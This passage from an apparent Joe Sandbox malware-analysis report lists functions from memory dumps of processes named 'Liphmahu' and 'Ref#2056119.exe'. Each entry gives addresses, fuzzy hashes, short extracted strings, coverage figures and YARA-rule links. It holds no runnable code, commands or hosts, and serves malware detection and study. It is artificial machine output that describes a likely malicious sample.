Function 05D6FEF0 Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2208427016.0000000005D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5d60000_Liphmahu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fac1b1d7f98601ec301a47fd2dc9e9c73f250e9fdf80b8e5f2e1e163db39775f
Instruction ID: 5cdaa41959927eb75a585edae02e0338bd35399d34ae5533611ac88a282029b4
Opcode Fuzzy Hash: fac1b1d7f98601ec301a47fd2dc9e9c73f250e9fdf80b8e5f2e1e163db39775f
Instruction Fuzzy Hash: 3EC012712082845FCB02CE18CD28C05BF71EB96204B09C0ABA844CA2A2F6268C06F711

Function 05D43CFA Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2207982072.0000000005D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5d40000_Liphmahu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e8615816863812d15e042572bfc5bb171aefea573100f63de4882c33dfb4b2d4
Instruction ID: 80ec9f22d2c3b6c17bd99047b0c385f8f4248c00fa92c07fb40c075a0fc2f481
Opcode Fuzzy Hash: e8615816863812d15e042572bfc5bb171aefea573100f63de4882c33dfb4b2d4
Instruction Fuzzy Hash: 05C04C76E1011E9BCF00DBD9E4409DCFB74EF94321F404036D214A7104D6305526DF50

Function 05D4635E Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2207982072.0000000005D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5d40000_Liphmahu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d3a3cfc504cd3c31ebcc0f76673a0b037e7b573997e113929ad4c9eb3b750390
Instruction ID: 6943f95d5942926b4cbccdafff06cabc1cc0c4310696933d72577c4fccd7f17f
Opcode Fuzzy Hash: d3a3cfc504cd3c31ebcc0f76673a0b037e7b573997e113929ad4c9eb3b750390
Instruction Fuzzy Hash: CCD09230A90A19CFDB10EB14DD48B9ABBB1BB05305F0091A5C049A2255D6705E848F00

Function 05D6ACF0 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2208427016.0000000005D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5d60000_Liphmahu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9145439845d19ed285ef8ed2e2731e53e84310996d3e08af64ba1494253e8755
Instruction ID: a5ced1602b898661de329531365079a034e3d75a808f59c5ffcbefa728424f66
Opcode Fuzzy Hash: 9145439845d19ed285ef8ed2e2731e53e84310996d3e08af64ba1494253e8755
Instruction Fuzzy Hash: 58C0927A140208EFC700DF69E848C85BBB8EF1977171180A1FA088B332C732EC60DA94

Function 05D434A1 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2207982072.0000000005D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5d40000_Liphmahu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 973626fe39186c9fed9e8ce7f288fcbd6588a2e6dc1da52f4d730579d28f9f52
Instruction ID: fbefe7ab718257c30524c22448147910e2e6ae0152596a1ae499272d6abbf8b6
Opcode Fuzzy Hash: 973626fe39186c9fed9e8ce7f288fcbd6588a2e6dc1da52f4d730579d28f9f52
Instruction Fuzzy Hash: F3D0CAB8E02328CFCB20CF24D985B88BBB2BF46300F0044DA9699A2201DB704E80CF02

Function 05D4ACAD Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2207982072.0000000005D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5d40000_Liphmahu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7ee210cba2e6d7cc4524526e86c93d4ff05fa25d5bf529a9e2d9bbf6fba4ca14
Instruction ID: f85fd16ab0a7fd8941fc35b031f43f8ed77201688f9391ed524c187132c354f1
Opcode Fuzzy Hash: 7ee210cba2e6d7cc4524526e86c93d4ff05fa25d5bf529a9e2d9bbf6fba4ca14
Instruction Fuzzy Hash: 27C08C301481088BF340EBA4C4182AC3AA3E768B04F40C00AD0427B2C4CA748A068F24

Function 05D6F1E0 Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2208427016.0000000005D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5d60000_Liphmahu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3a3ac74fc298218ccaa70aaad394fdc026ac11c119e654f163ee9b9bc33d5379
Instruction ID: fb0c7195d362bed6af3b964b0ff3667b819cd08e40caa3ea853de09e0cf38f9b
Opcode Fuzzy Hash: 3a3ac74fc298218ccaa70aaad394fdc026ac11c119e654f163ee9b9bc33d5379
Instruction Fuzzy Hash: 67B09232040209AB8B019B84E804859BF69BB58704B048026A609062218B32A822DAD8

Function 05D68821 Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2208427016.0000000005D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5d60000_Liphmahu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e30dce91f2ffab53f6f499cc5d8a490cc2932782713aab253fcad2918a86c580
Instruction ID: 0160c7151d326af79bcb440949ee3d3bee4de2c3e96d4ee4c79b64bac9791f17
Opcode Fuzzy Hash: e30dce91f2ffab53f6f499cc5d8a490cc2932782713aab253fcad2918a86c580
Instruction Fuzzy Hash: C9A0027629524693DA503160ED97B454104DBA0554FE68A67DE107D190D48F70863635

Non-executed Functions

Function 05D673A8 Relevance: 7.7, Strings: 6, Instructions: 151COMMON

Download Yara Rule

Strings

(oq, xrefs: 05D67572
4'kq, xrefs: 05D6742C
4'kq, xrefs: 05D6745C
4'kq, xrefs: 05D6747A
poq, xrefs: 05D674FF
4'kq, xrefs: 05D674F2

Memory Dump Source

Source File: 00000004.00000002.2208427016.0000000005D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5d60000_Liphmahu.jbxd

Similarity

API ID:
String ID: (oq$4'kq$4'kq$4'kq$4'kq$poq
API String ID: 0-755401861
Opcode ID: 0aec547355da3d227113a1b27031927b8092162b6187258794f0308abc99d923
Instruction ID: 0ae75b91425222735eca7fdc3b9983669188d38929ebfe005619f39a26d74943
Opcode Fuzzy Hash: 0aec547355da3d227113a1b27031927b8092162b6187258794f0308abc99d923
Instruction Fuzzy Hash: 71518130A402099FCB14EB6D89506AFBBEBFFC8300F54886DC445973A9DB35E9468791

Function 05D6E1DF Relevance: 5.2, Strings: 4, Instructions: 186COMMON

Download Yara Rule

Strings

(_kq, xrefs: 05D6E893
(_kq, xrefs: 05D6E89D
(_kq, xrefs: 05D6E90A
(_kq, xrefs: 05D6E8D4

Memory Dump Source

Source File: 00000004.00000002.2208427016.0000000005D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5d60000_Liphmahu.jbxd

Similarity

API ID:
String ID: (_kq$(_kq$(_kq$(_kq
API String ID: 0-3111510350
Opcode ID: d391828d50526591e9d036b1dac25b0559c96cc2590144cb7fb4bb4970031219
Instruction ID: c40a5fad72b01ee72cec9a73adcceebf79ec68fb391d80dd827a23c254f5e55d
Opcode Fuzzy Hash: d391828d50526591e9d036b1dac25b0559c96cc2590144cb7fb4bb4970031219
Instruction Fuzzy Hash: 3461BF79B00605CFCB04DF68C49596EBBB6FF89310B64456AE406DB3A5EB31EC42CB91

Analysis Process: Ref#2056119.exePID: 7912, Parent PID: 2580COMMON

Execution Graph

Execution Coverage:	11.7%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	17
Total number of Limit Nodes:	4

Executed Functions

Function 06B33100 Relevance: 8.0, Strings: 6, Instructions: 545
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$kq, xrefs: 06B3380B
$kq, xrefs: 06B33828
$kq, xrefs: 06B33858
$kq, xrefs: 06B33834
$kq, xrefs: 06B3384C
$kq, xrefs: 06B337FF

Memory Dump Source

Source File: 00000005.00000002.3138652715.0000000006B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6b30000_Ref#2056119.jbxd

Similarity

API ID:
String ID: $kq$$kq$$kq$$kq$$kq$$kq
API String ID: 0-1342094364
Opcode ID: 55056ef0d1ddcf6324753aace8f2a7a315e6f470fab25472dd846f3e695972cd
Instruction ID: 1532a2df767709d0113658fc40a3231748a8b0cb1013617da9448e11a073d181
Opcode Fuzzy Hash: 55056ef0d1ddcf6324753aace8f2a7a315e6f470fab25472dd846f3e695972cd
Instruction Fuzzy Hash: F4322031E1066ACFCB14EF75D95459EF7B2FFC9300F208699D409AB264EB30A985CB90

Function 06B37DF0 Relevance: 3.0, Strings: 2, Instructions: 477
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$kq, xrefs: 06B38397
$kq, xrefs: 06B3838B

Memory Dump Source

Source File: 00000005.00000002.3138652715.0000000006B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6b30000_Ref#2056119.jbxd

Similarity

API ID:
String ID: $kq$$kq
API String ID: 0-3550614674
Opcode ID: a8de880c70b953e203fd9f76df54af42a746c9466e3278d78cd88f5df64527ce
Instruction ID: 3bf258a62a2d2551232b3bd744f2404a7efb6af46c9a81fcda0ac776a47dbb57
Opcode Fuzzy Hash: a8de880c70b953e203fd9f76df54af42a746c9466e3278d78cd88f5df64527ce
Instruction Fuzzy Hash: 3702A070B102268FDB54DB65D9906AEB7F6FF84300F148569E4069B398DB35EC86CB81

Function 06B32409 Relevance: 1.0, Instructions: 1016COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3138652715.0000000006B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6b30000_Ref#2056119.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a704706bcf580d3faa13fde1596a12971cdb65de35adc2b7cceb477b193f4f0f
Instruction ID: 428300f7ae2779f2c73e906e3e7e2c433e6af1c546b27c2ada5adaa948940cb7
Opcode Fuzzy Hash: a704706bcf580d3faa13fde1596a12971cdb65de35adc2b7cceb477b193f4f0f
Instruction Fuzzy Hash: A6923570B002248FDBA4DF68C584B6DB7F2EF45314F5485A9E40AAB365DB35EE85CB80

Function 06B36668 Relevance: .8, Instructions: 822COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3138652715.0000000006B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6b30000_Ref#2056119.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 06dcd94b49c08457e8a82c0acea975802786404357d7b1f5465b49dad9df1c74
Instruction ID: 02b6a8eb686498c5cbd9ebe776271e29110957d35e14eafcd1312d1f0a4042cc
Opcode Fuzzy Hash: 06dcd94b49c08457e8a82c0acea975802786404357d7b1f5465b49dad9df1c74
Instruction Fuzzy Hash: C262AE70B002299FDF54DB68D584AADB7F2EF88310F1485A9E806DB395EB35ED45CB80

Function 06B3C200 Relevance: .7, Instructions: 655COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3138652715.0000000006B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6b30000_Ref#2056119.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e05c4ebc78537cd5a1fbcc74a04e2beb5777cbe6420b80d406ce20457c2d2723
Instruction ID: 0aba45e147ab7c8609d07f681df6d9fb54b48431886041cac742d9b264d0c3d2
Opcode Fuzzy Hash: e05c4ebc78537cd5a1fbcc74a04e2beb5777cbe6420b80d406ce20457c2d2723
Instruction Fuzzy Hash: A7328170B102298FDF54DFA8D980AAEBBB2FB88310F109565D506E7399DB35EC41CB90

Function 06B35640 Relevance: .6, Instructions: 596COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3138652715.0000000006B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6b30000_Ref#2056119.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b641f8d9eef54c7ddfb5473e4f58883d7494d5719b746de66d5ff751e1871d87
Instruction ID: 07b0094fa584b06db145720c6b21d7be0b783ae3275a0439e4076b85c97bad55
Opcode Fuzzy Hash: b641f8d9eef54c7ddfb5473e4f58883d7494d5719b746de66d5ff751e1871d87
Instruction Fuzzy Hash: EB12F1B2F002259FDF70DB64D88066EB7B6FF84320F2485A9D8569B395CA34EC41CB90

Function 06B3B2A3 Relevance: .6, Instructions: 566COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3138652715.0000000006B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6b30000_Ref#2056119.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 55f1823c27bba57af46f35590c7b951553c6baca9e3bcf9a49bf18f9e6050eca
Instruction ID: 3336cb31add7f1d52233b947d46584de4aa42269d0ce5de8b4f7a93db8f1e2d2
Opcode Fuzzy Hash: 55f1823c27bba57af46f35590c7b951553c6baca9e3bcf9a49bf18f9e6050eca
Instruction Fuzzy Hash: EE2281B0F102299FDF60CB68C5907ADB7B2FB95310F20956AE409EB399DA35DC81CB51

Function 06B3B6C8 Relevance: 8.0, Strings: 6, Instructions: 474COMMON

Download Yara Rule

Strings

$kq, xrefs: 06B3BBFF
$kq, xrefs: 06B3BC67
$kq, xrefs: 06B3BBF3
$kq, xrefs: 06B3BC5B
$kq, xrefs: 06B3BC27
$kq, xrefs: 06B3BC33

Memory Dump Source

Source File: 00000005.00000002.3138652715.0000000006B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6b30000_Ref#2056119.jbxd

Similarity

API ID:
String ID: $kq$$kq$$kq$$kq$$kq$$kq
API String ID: 0-1342094364
Opcode ID: c0bfab67c72212611f1f74390da6f6a9ee884088fe8251de393b6e33a312e461
Instruction ID: 60de0d0bd7ba61f435b5c16383d97086356b9569b0162bc190f517977a2ce62e
Opcode Fuzzy Hash: c0bfab67c72212611f1f74390da6f6a9ee884088fe8251de393b6e33a312e461
Instruction Fuzzy Hash: A2029EB0F1022A9FDB64CF68D5806ADB7B2FB95310F2095AAD405DB359DB34ED85CB80

Function 06B391C0 Relevance: 5.2, Strings: 4, Instructions: 231
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$kq, xrefs: 06B39277
$kq, xrefs: 06B3923C
$kq, xrefs: 06B39230
$kq, xrefs: 06B3926B

Memory Dump Source

Source File: 00000005.00000002.3138652715.0000000006B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6b30000_Ref#2056119.jbxd

Similarity

API ID:
String ID: $kq$$kq$$kq$$kq
API String ID: 0-2881790790
Opcode ID: 404fdf8e634fa00e052ce0652c89e19ce9acf3c53974ad9ee29bceb4f629e1ee
Instruction ID: 5e077523e17fd3a621262c482228f689d75657d0f52adc492ed85d39516cf128
Opcode Fuzzy Hash: 404fdf8e634fa00e052ce0652c89e19ce9acf3c53974ad9ee29bceb4f629e1ee
Instruction Fuzzy Hash: 19915270F0021A8FDB64EF65D9507AEB3F6EFC4240F1085A9C40AAB398EB70DD458B90

Function 06B3CFB8 Relevance: 4.6, Strings: 3, Instructions: 808
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$kq, xrefs: 06B3D3C3
$kq, xrefs: 06B3D3AF
$kq, xrefs: 06B3D3B7

Memory Dump Source

Source File: 00000005.00000002.3138652715.0000000006B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6b30000_Ref#2056119.jbxd

Similarity

API ID:
String ID: $kq$$kq$$kq
API String ID: 0-2086306503
Opcode ID: ce23cf3911eb4f4dc8eaefabca97e87a40a81f33d38442ea1e7da932f148b04a
Instruction ID: 77eb6521ada69979c55c0ba2aedcc87bae78a09f606da2844d64e037a03f87cc
Opcode Fuzzy Hash: ce23cf3911eb4f4dc8eaefabca97e87a40a81f33d38442ea1e7da932f148b04a
Instruction Fuzzy Hash: CA622370B1021A8FCB55EF68D590A5EB7B2FF85310B208A78D4059F369DB75ED86CB80

Function 06B34C10 Relevance: 3.9, Strings: 3, Instructions: 186
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

fpq, xrefs: 06B34C3B
XPpq, xrefs: 06B34D61
\Opq, xrefs: 06B34DEB

Memory Dump Source

Source File: 00000005.00000002.3138652715.0000000006B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6b30000_Ref#2056119.jbxd

Similarity

API ID:
String ID: fpq$XPpq$\Opq
API String ID: 0-2571271785
Opcode ID: 5a7bf28552cfa914c785606eab69778b0d6b8cf9124b0a58764e9248c4f2141a
Instruction ID: f0342bf252bdb9a0b0f7c6a332299eef5104a51b3aedc3c3cae9a4b76dd7bd76
Opcode Fuzzy Hash: 5a7bf28552cfa914c785606eab69778b0d6b8cf9124b0a58764e9248c4f2141a
Instruction Fuzzy Hash: 7A618AB0F102199FEF54DFA5C854BAEBAF6FF88700F208169D106AB394DB759C458B90

Function 06B391B3 Relevance: 2.7, Strings: 2, Instructions: 170
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$kq, xrefs: 06B39230
$kq, xrefs: 06B3926B

Memory Dump Source

Source File: 00000005.00000002.3138652715.0000000006B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6b30000_Ref#2056119.jbxd

Similarity

API ID:
String ID: $kq$$kq
API String ID: 0-3550614674
Opcode ID: a216feb0b57b05ccde4d0985791373959da4b195f822c9317b7f3c10050b43f1
Instruction ID: 280d3231358d680decd9c04a797442d497812aa781135527043fcd6b5d32e163
Opcode Fuzzy Hash: a216feb0b57b05ccde4d0985791373959da4b195f822c9317b7f3c10050b43f1
Instruction Fuzzy Hash: 93513F70B1011A8FDF54EF79D990B6EB3F6EBC8640F108569D40ADB398EA71DC518B90

Function 06B34C00 Relevance: 2.6, Strings: 2, Instructions: 142
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

fpq, xrefs: 06B34C3B
XPpq, xrefs: 06B34D61

Memory Dump Source

Source File: 00000005.00000002.3138652715.0000000006B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6b30000_Ref#2056119.jbxd

Similarity

API ID:
String ID: fpq$XPpq
API String ID: 0-1280283
Opcode ID: c34fc665580b0b97cfb2d45586d9dbe4a08204d9317c3519ecbb101b26e69931
Instruction ID: 50d3c526871eb6b76f8ccb0c6ee7e3668c7493df651de7a17120c5327fd4dfa4
Opcode Fuzzy Hash: c34fc665580b0b97cfb2d45586d9dbe4a08204d9317c3519ecbb101b26e69931
Instruction Fuzzy Hash: 92519D70F102199FDB54DFB5C854BAEBBF6FF88700F208529E506AB398DA718C458B90

Function 06B3DB2D Relevance: 1.4, Strings: 1, Instructions: 122COMMON

Download Yara Rule

Strings

PHkq, xrefs: 06B3DC89

Memory Dump Source

Source File: 00000005.00000002.3138652715.0000000006B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6b30000_Ref#2056119.jbxd

Similarity

API ID:
String ID: PHkq
API String ID: 0-902561536
Opcode ID: 6f035940fb1a44c12dd43569c00da2581660faaa9057c47af060e88573744b83
Instruction ID: bd040e78646ac3b8f794fcf0d95876b323187138e4e9f65a5640cf3f2aa655fd
Opcode Fuzzy Hash: 6f035940fb1a44c12dd43569c00da2581660faaa9057c47af060e88573744b83
Instruction Fuzzy Hash: 2741AEB0F1031A9FDB65DF65D58469EBBB2FF85300F20456AE406EB254EBB4D846CB80

Function 06B3227D Relevance: 1.4, Strings: 1, Instructions: 110COMMON

Download Yara Rule

Strings

PHkq, xrefs: 06B323CB

Memory Dump Source

Source File: 00000005.00000002.3138652715.0000000006B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6b30000_Ref#2056119.jbxd

Similarity

API ID:
String ID: PHkq
API String ID: 0-902561536
Opcode ID: 17b81b387109bead1cda5e724a90c91478362856aa2aa9eebd323e2c5883fc86
Instruction ID: 6b83d265158572a7f552569228f8f385ec7def2d8139ca438f7414b3168ab3c9
Opcode Fuzzy Hash: 17b81b387109bead1cda5e724a90c91478362856aa2aa9eebd323e2c5883fc86
Instruction Fuzzy Hash: AE31E171B002259FDF659B34DA9466E7BA2EF89300F2454A8D406DB398DF35CE46CB90

Function 06B32290 Relevance: 1.4, Strings: 1, Instructions: 105COMMON

Download Yara Rule

Strings

PHkq, xrefs: 06B323CB

Memory Dump Source

Source File: 00000005.00000002.3138652715.0000000006B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6b30000_Ref#2056119.jbxd

Similarity

API ID:
String ID: PHkq
API String ID: 0-902561536
Opcode ID: 317b7187f3c7240f841251242dc39ed4927803ce0153118ebe09a8066f74760e
Instruction ID: 859f4ed8ffbe725e5ad6541470009f8a51a1665ac018793f64277ff01cfbfb88
Opcode Fuzzy Hash: 317b7187f3c7240f841251242dc39ed4927803ce0153118ebe09a8066f74760e
Instruction Fuzzy Hash: A331EF70B002158FDB64AB34DA9466E7AA6FF88200B205468D406DB398DF35DE46CB94

Function 06B38340 Relevance: 1.3, Strings: 1, Instructions: 40COMMON

Download Yara Rule

Strings

$kq, xrefs: 06B3838B

Memory Dump Source

Source File: 00000005.00000002.3138652715.0000000006B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6b30000_Ref#2056119.jbxd

Similarity

API ID:
String ID: $kq
API String ID: 0-3037731980
Opcode ID: e68b66f655d98ba09990042a58abdf6556fea742db1d821979d21f75375bb2c1
Instruction ID: 56614fc1bcc86cfeaffc39ce060006d23c37bcdfe32c0e091aa28539628a2e5e
Opcode Fuzzy Hash: e68b66f655d98ba09990042a58abdf6556fea742db1d821979d21f75375bb2c1
Instruction Fuzzy Hash: 48F0A9B1B102268FDF749E55EA802ACB3A5EB80311F1055BAF906CB395DA35DA06C782

Function 06B34330 Relevance: .2, Instructions: 236COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3138652715.0000000006B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6b30000_Ref#2056119.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 96e4590a58cb63f6e6f33269cd7c1a69676e11510f2aebb1f23a480cfcd5b0f4
Instruction ID: 95a244236d4de3f1149e26941980e3074b50e32a31c045cbf7f952380ef8c8a9
Opcode Fuzzy Hash: 96e4590a58cb63f6e6f33269cd7c1a69676e11510f2aebb1f23a480cfcd5b0f4
Instruction Fuzzy Hash: C7817C70B0021A8FDF54DFA9D5546AEB7F6EF85300F108579D40ADB3A9EA30DC468B91

Function 06B36268 Relevance: .2, Instructions: 229COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3138652715.0000000006B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6b30000_Ref#2056119.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cf59267806b9be28df997ed7117962dcef035f66b2f349aecb9abce351e9aa85
Instruction ID: 6ce0406c34c74d909a414de1629fb091b47a68207adcb81584d243f1df285d11
Opcode Fuzzy Hash: cf59267806b9be28df997ed7117962dcef035f66b2f349aecb9abce351e9aa85
Instruction Fuzzy Hash: 2C61D3B2F002214FCF549A7DC98066EBBDBEFD4620B154479E80ADB379EE65DC028785

Function 06B34660 Relevance: .2, Instructions: 224COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3138652715.0000000006B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6b30000_Ref#2056119.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 92cb6d48e833ce3a964e928368049ea348694f7a15e341c4c16cc4cb589b95f8
Instruction ID: 25af1e607f1472058332f7c8b6c615914f849b77ea1f732113d60d66ca395956
Opcode Fuzzy Hash: 92cb6d48e833ce3a964e928368049ea348694f7a15e341c4c16cc4cb589b95f8
Instruction Fuzzy Hash: ED915C70E102198FDF60DF68C890B9DB7B1FF89310F208699D549AB295DB70AE85CF91

Function 06B34678 Relevance: .2, Instructions: 210COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3138652715.0000000006B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6b30000_Ref#2056119.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2416cbf801f4a10b85adc1b798e7e4cdf3c48141c393374658b5270a8e5a62bf
Instruction ID: 916f63966e9033ca677302e5f5ff58516b19ca62e478b424ab1202939fc0c60a
Opcode Fuzzy Hash: 2416cbf801f4a10b85adc1b798e7e4cdf3c48141c393374658b5270a8e5a62bf
Instruction Fuzzy Hash: E8912B70E106198BDF60DF68C980B9DB7B1FF89310F208699D549AB255DB70AA85CF90

Function 06B3EB98 Relevance: .2, Instructions: 201COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3138652715.0000000006B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6b30000_Ref#2056119.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 31e615a1433cfc4d69e1629ffd7ec8653a71fc1d5263f4afd82a2b27c00939ba
Instruction ID: 22e564923a8aa99da068f2b7038c19b5fa5de1514d69311d301c1765c55f9861
Opcode Fuzzy Hash: 31e615a1433cfc4d69e1629ffd7ec8653a71fc1d5263f4afd82a2b27c00939ba
Instruction Fuzzy Hash: 2B71F870B002199FDB54DFA9D980AAEBBF6FF84300F14856AD416AB359DB30ED46CB50

Function 06B3EB89 Relevance: .2, Instructions: 200COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3138652715.0000000006B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6b30000_Ref#2056119.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b61b0ca110ddb600dd1bc4fee43661dbda6298c3e20df6e5b95e5f24749d360f
Instruction ID: 28598fa9a55acd5e0bb4d65508869a14fbbeb608fd8ceeb66673c10fd7588a21
Opcode Fuzzy Hash: b61b0ca110ddb600dd1bc4fee43661dbda6298c3e20df6e5b95e5f24749d360f
Instruction Fuzzy Hash: E1712A70B002599FCB54DFA9D980AAEBBF6FF84300F14856AD406AB359DB30ED46CB50

Function 06B3FCF7 Relevance: .2, Instructions: 175COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3138652715.0000000006B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6b30000_Ref#2056119.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c0fd4991065f5c0b3637b9db88c2c20af27fb663f049c6b04193de22ae9a5545
Instruction ID: f1b1a76f10b4273556099fa8f089a632e49c24e1bd958ff01513806574111e5f
Opcode Fuzzy Hash: c0fd4991065f5c0b3637b9db88c2c20af27fb663f049c6b04193de22ae9a5545
